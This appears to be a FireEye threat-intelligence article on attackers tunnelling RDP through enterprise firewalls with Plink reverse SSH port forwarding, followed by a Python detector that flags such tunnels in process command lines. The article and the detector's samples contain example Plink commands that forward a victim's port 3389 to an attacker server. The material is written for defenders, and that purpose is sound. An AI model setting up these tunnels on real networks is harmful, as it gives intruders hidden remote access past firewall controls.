
Remote Desktop Services is a component of Microsoft Windows that is used by various companies for the convenience it offers systems administrators, engineers and remote employees. On the other hand, Remote Desktop Services, and specifically the Remote Desktop Protocol (RDP), offers this same convenience to remote threat actors during targeted system compromises. When sophisticated threat actors establish a foothold and acquire ample logon credentials, they may switch from backdoors to using direct RDP sessions for remote access.

When malware is removed from the equation, intrusions become increasingly difficult to detect. Threat actors continue to prefer RDP for the stability and functionality advantages over non-graphical backdoors, which can leave unwanted artifacts on a system. As a result, FireEye has observed threat actors using native Windows RDP utilities to connect laterally across systems in compromised environments.

Historically, non-exposed systems protected by a firewall and NAT rules were generally considered not to be vulnerable to inbound RDP attempts; however, threat actors have increasingly started to subvert these enterprise controls with the use of network tunneling and host-based port forwarding.

Network tunneling and port forwarding take advantage of firewall "pinholes" (ports not protected by the firewall that allow an application access to a service on a host in the network protected by the firewall) to establish a connection with a remote server blocked by a firewall. Once a connection has been established to the remote server through the firewall, the connection can be used as a transport mechanism to send or "tunnel" local listening services (located inside the firewall) through the firewall, making them accessible to the remote server (located outside the firewall), as shown in Figure 1.

Figure 1: Enterprise firewall bypass using RDP and network tunneling with SSH as an example

Inbound RDP Tunneling

A common utility used to tunnel RDP sessions is PuTTY Link, commonly known as Plink. Plink can be used to establish secure shell (SSH) network connections to other systems using arbitrary source and destination ports. Since many IT environments either do not perform protocol inspection or do not block SSH communications outbound from their network, attackers such as FIN8 have used Plink to create encrypted tunnels that allow RDP ports on infected systems to communicate back to the attacker command and control (C2) server.

Example Plink Executable: -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389

Figure 2 provides an example of a successful RDP tunnel created using Plink, and Figure 3 provides an example of communications being sent through the tunnel using port forwarding from the attacker C2 server.

Figure 2: Example of successful RDP tunnel created using Plink

Figure 3: Example of successful port forwarding from the attacker C2 server to the victim

It should be noted that for an attacker to be able to RDP to a system, they must already have access to the system through other means of compromise in order to create or access the necessary tunneling utility.
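The detection side of the reverse-tunnel technique described above, as an added example that is not part of the original FireEye post: a small Python parser that inspects process command lines and flags SSH client invocations (Plink or OpenSSH) whose -R remote forward relays port 3389 back to the SSH server. The sample command lines, user names, hostnames and addresses are constructed; the handling of -P, -N and -R follows the flag meanings of the Plink command line shown above.

```python
import shlex
from dataclasses import dataclass, field

RDP_PORT = 3389
SSH_CLIENTS = {"plink.exe", "plink", "ssh.exe", "ssh"}
@dataclass
class Finding:
    image: str
    ssh_port: int = 22                      # Plink -P / OpenSSH -p; defaults to 22
    tunnel_only: bool = False               # -N given: no remote shell, tunnel only
    reverse_forwards: list = field(default_factory=list)   # every -R spec as written
    exposes_rdp: bool = False               # some -R forward's destination port is 3389
def analyse_cmdline(cmdline: str) -> "Finding | None":
    # Windows-style tokenising: keep backslashes and surrounding quotes intact
    try:
        argv = shlex.split(cmdline, posix=False)
    except ValueError:
        argv = []
    image = argv[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower() if argv else ""
    if image not in SSH_CLIENTS:
        return None                         # not an SSH client, nothing to inspect
    f, i = Finding(image=image), 1
    while i < len(argv):
        arg = argv[i]
        if arg in ("-P", "-p") and i + 1 < len(argv) and argv[i + 1].isdigit():
            i += 1
            f.ssh_port = int(argv[i])
        elif arg == "-N":
            f.tunnel_only = True
        elif arg.startswith("-R"):          # remote forward, given as "-R spec" or "-Rspec"
            spec = arg[2:]
            if not spec and i + 1 < len(argv):
                i += 1
                spec = argv[i]
            f.reverse_forwards.append(spec)
            # spec = [listen-addr:]listen-port:dest-host:dest-port; the SSH server listens
            # and the victim relays that listener to dest-host:dest-port (3389 = RDP)
            f.exposes_rdp |= spec.rsplit(":", 1)[-1] == str(RDP_PORT)
        i += 1
    return f
def scan(cmdlines: list) -> list:
    # keep only SSH client invocations that relay RDP back to the SSH server
    hits = (analyse_cmdline(c) for c in cmdlines)
    return [h for h in hits if h is not None and h.exposes_rdp]
# Constructed sample process-creation command lines (not captured from a real incident)
SAMPLE_CMDLINES = [
    r"C:\Windows\Temp\plink.exe user@203.0.113.10 -pw Pa55 -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389",
    r'"C:\Program Files\PuTTY\plink.exe" admin@jump.example.net -P 2222 -N -R12345:10.0.0.5:3389',
    r"C:\Windows\System32\OpenSSH\ssh.exe -p 22 build@git.example.net -L 8080:localhost:80",
    r"notepad.exe C:\Users\bob\notes.txt",
]
```

Feeding real Sysmon Event ID 1 or Windows 4688 command lines into scan() instead of SAMPLE_CMDLINES turns this into a hunt for the tunnel described above; a -R forward to port 3389 from a host that has no business running an SSH client is the signal to investigate.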
